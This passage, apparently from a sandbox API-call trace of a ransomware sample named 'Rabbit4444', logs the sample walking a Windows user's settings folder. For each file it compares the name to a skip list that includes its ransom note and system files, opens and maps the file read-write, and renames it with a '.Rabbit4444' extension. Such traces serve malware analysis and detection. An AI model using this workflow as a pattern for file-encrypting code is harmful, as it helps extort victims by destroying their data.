(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\ControlPanel.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\controlpanel.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\ControlPanel.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\controlpanel.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.802] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f72510, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57f72510, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2433f6fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x306, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CortanaSettings.settingcontent-ms", cAlternateFileName="CORTAN~1.SET")) returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2=".") returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="..") returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="windows") returned -1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="boot") returned 1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.802] lstrcmpiW (lpString1="CortanaSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.802] lstrcpyW (in: lpString1=0x130ec22, lpString2="CortanaSettings.settingcontent-ms" | out: lpString1="CortanaSettings.settingcontent-ms") returned="CortanaSettings.settingcontent-ms" [0059.802] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\CortanaSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.806] lstrlenW (lpString="CortanaSettings.settingcontent-ms") returned 33 [0059.806] lstrlenW (lpString="Rabbit4444") returned 10 [0059.806] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.806] lstrlenW (lpString=".dll") returned 4 [0059.806] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.806] lstrlenW (lpString=".lnk") returned 4 [0059.806] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.806] lstrlenW (lpString=".ini") returned 4 [0059.806] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.806] lstrlenW (lpString=".sys") returned 4 [0059.806] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.807] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\CortanaSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\cortanasettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.807] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.807] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15111763065) returned 1 [0059.807] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=774) returned 1 [0059.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.807] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x610, lpName=0x0) returned 0x298 [0059.809] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x610) returned 0x70000 [0059.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.810] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.811] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15112147336) returned 1 [0059.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.811] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.811] CloseHandle (hObject=0x298) returned 1 [0059.811] CloseHandle (hObject=0x278) returned 1 [0059.811] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\CortanaSettings.settingcontent-ms.Rabbit4444") returned 161 [0059.811] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\CortanaSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\cortanasettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\CortanaSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\cortanasettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.812] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea16dae4, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea252ad0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", cAlternateFileName="NAMESP~1.SET")) returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2=".") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="..") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="windows") returned -1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="boot") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="ids.txt") returned 1 [0059.812] lstrcmpiW (lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.812] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms" | out: lpString1="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms") returned="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms" [0059.812] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.301] lstrlenW (lpString="NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms") returned 59 [0060.308] lstrlenW (lpString="Rabbit4444") returned 10 [0060.365] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.368] lstrlenW (lpString=".dll") returned 4 [0060.368] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.369] lstrlenW (lpString=".lnk") returned 4 [0060.370] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.372] lstrlenW (lpString=".ini") returned 4 [0060.372] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.372] lstrlenW (lpString=".sys") returned 4 [0060.372] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.376] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_0_flashplayercplapp.cpl.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.400] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15172130745) returned 1 [0060.413] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1016) returned 1 [0060.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0060.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0060.419] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x2a0 [0060.444] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0060.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0060.540] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x126048 [0060.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126048 | out: hHeap=0xe0000) returned 1 [0060.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0060.556] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15186827609) returned 1 [0060.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0060.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0060.559] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.562] CloseHandle (hObject=0x2a0) returned 1 [0060.562] CloseHandle (hObject=0x29c) returned 1 [0060.563] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms.Rabbit4444") returned 187 [0060.568] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_0_flashplayercplapp.cpl.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_0_flashplayercplapp.cpl.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.588] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3378c4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xea3378c4, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea50151c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", cAlternateFileName="NAMESP~2.SET")) returned 1 [0060.589] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.589] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2=".") returned 1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="..") returned 1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="windows") returned -1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.590] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="boot") returned 1 [0060.596] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.599] lstrcmpiW (lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.599] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms") returned="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms" [0060.613] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.629] lstrlenW (lpString="NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms") returned 74 [0060.629] lstrlenW (lpString="Rabbit4444") returned 10 [0060.629] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.629] lstrlenW (lpString=".dll") returned 4 [0060.629] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.629] lstrlenW (lpString=".lnk") returned 4 [0060.629] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.633] lstrlenW (lpString=".ini") returned 4 [0060.633] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.633] lstrlenW (lpString=".sys") returned 4 [0060.633] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{025a5937-a6be-4686-a844-36fe4bec8b6d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.633] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.633] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15194412573) returned 1 [0060.633] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1116) returned 1 [0060.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0060.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0060.634] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x29c [0060.635] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0060.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0060.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0060.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0060.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0060.636] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15194664396) returned 1 [0060.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0060.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0060.636] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.636] CloseHandle (hObject=0x29c) returned 1 [0060.636] CloseHandle (hObject=0x2a0) returned 1 [0060.636] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms.Rabbit4444") returned 202 [0060.636] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{025a5937-a6be-4686-a844-36fe4bec8b6d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{025a5937-a6be-4686-a844-36fe4bec8b6d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb34f60c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xeb34f60c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeb8605b5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", cAlternateFileName="NAMESP~3.SET")) returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2=".") returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="..") returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="windows") returned -1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.637] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.638] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="boot") returned 1 [0060.638] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.638] lstrcmpiW (lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.638] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms") returned="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms" [0060.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.638] lstrlenW (lpString="NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms") returned 74 [0060.638] lstrlenW (lpString="Rabbit4444") returned 10 [0060.638] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.638] lstrlenW (lpString=".dll") returned 4 [0060.639] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.639] lstrlenW (lpString=".lnk") returned 4 [0060.639] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.639] lstrlenW (lpString=".ini") returned 4 [0060.639] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.639] lstrlenW (lpString=".sys") returned 4 [0060.639] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.639] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms" (normalized: 